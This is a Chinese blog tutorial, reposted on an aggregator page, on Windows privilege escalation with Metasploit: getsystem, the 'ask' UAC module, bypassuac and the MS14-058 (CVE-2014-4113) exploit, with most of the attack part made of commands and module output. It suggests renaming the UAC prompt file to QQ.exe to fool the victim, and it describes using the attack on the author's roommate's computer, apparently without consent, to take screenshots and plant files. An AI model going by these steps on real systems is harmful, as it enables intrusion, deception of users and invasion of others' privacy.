IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 内网渗透(二):权限提升 -> 正文阅读

[网络协议]内网渗透(二):权限提升

前言

本博文仅供学习使用,请勿他用!!!

网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;

内网渗透(一):获得权限
内网渗透(二):权限提升

上篇博客获取到系统权限后,本文将会介绍如何提升获取到的系统权限,主要通过三种方式:提高程序运行级别,UAC 绕过,利用提权漏洞进行提权;
?

提高程序运行级别

1、查看当前的用户权限 getuid

meterpreter > getuid
Server username: WIN-50HM5UIKP60\sid10t

2、尝试提权 getsystem,这种成功的概率极小,果然报错了:

meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

3、把当前会话挂起 background,然后启用模块 use exploit/windows/local/ask,可以先通过 info 来查看一下这个模块的功能:

This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.
?
此模块将尝试使用 ShellExecute undocumented RunAs 标志来提升执行级别,以绕过低 UAC 设置。

4、设置模块的一些属性:

  • FILENAME:弹出 UAC 显示的文件名;
  • PATH:文件路径;
  • SESSION:选择会话的 ID;

设置完属性之后,就开始攻击 exploit

msf exploit(ask) > set session 2
session => 2
msf exploit(ask) > set filename sid10t.exe
filename => sid10t.exe
msf exploit(ask) > exploit 

这时候 windows 机子这边就会弹出如下的 UAC 窗口,跟我们设置的都能对上,为了让用户点击,可以改成 QQ.exe 这些容易迷惑受害者的:

5、如果用户选择 “否”,则过一会就会超时报错;

如果用户点击了 “是”,则会成功获取权限,这时候再尝试一下提权;

提权成功!
?

UAC 绕过

1、使用 bypassuac 模块进行攻击,可以看一下都有哪些绕过:

2、这里就使用 bypassuac,照例看一下相关信息:

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
?
此模块将通过进程注入利用受信任的发布者证书绕过 Windows UAC。它将生成第二个关闭了 UAC 标志的 shell。

3、设置一下 SESSION 就可以了:

msf exploit(bypassuac) > set session 2
session => 2

4、进行提权;

?

利用提权漏洞进行提权

1、这里使用 ms14_058_track_popup_menu 模块进行攻击,还有很多类似的;
2、看一下模块配置,只要一个 SESSION

3、看一下相关信息 info

msf exploit(ms14_058_track_popup_menu) > info

       Name: Windows TrackPopupMenu Win32k NULL Pointer Dereference
     Module: exploit/windows/local/ms14_058_track_popup_menu
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-10-14

Provided by:
  Unknown
  juan vazquez <juan.vazquez@metasploit.com>
  Spencer McIntyre
  OJ Reeves <oj@buffered.io>

Available targets:
  Id  Name
  --  ----
  0   Windows x86
  1   Windows x64

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION  2                yes       The session to run this module on.

Payload information:
  Space: 4096

Description:
  This module exploits a NULL Pointer Dereference in win32k.sys, the 
  vulnerability can be triggered through the use of TrackPopupMenu. 
  Under special conditions, the NULL pointer dereference can be abused 
  on xxxSendMessageTimeout to achieve arbitrary code execution. This 
  module has been tested successfully on Windows XP SP3, Windows 2003 
  SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 
  and Windows 2008 R2 SP1 64 bits.

References:
  https://cvedetails.com/cve/CVE-2014-4113/
  OSVDB (113167)
  http://www.securityfocus.com/bid/70364
  https://technet.microsoft.com/en-us/library/security/MS14-058
  http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/

可以看到它的适用范围;

4、exploit

因为目标主机是 x64 的,所以这里要切换目录;

攻击之后,windows 这边弹出个记事本报错,说明该漏洞失效了…

?

实战

根据上面的操作,对室友的电脑进行权限的获取与提升;

这是室友正在玩 MC,对其进行屏幕截图;

在桌面创建一个名为 sid10t 的文件夹;

上传了一个 haha.txt,并进行了读取;

后记

权限提升到这就结束了,各位读者可以自行尝试并举一反三;

个人网站:

本博文仅供学习使用,请勿他用!!!

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-05 11:56:47  更:2022-05-05 11:58:25 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 11:33:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计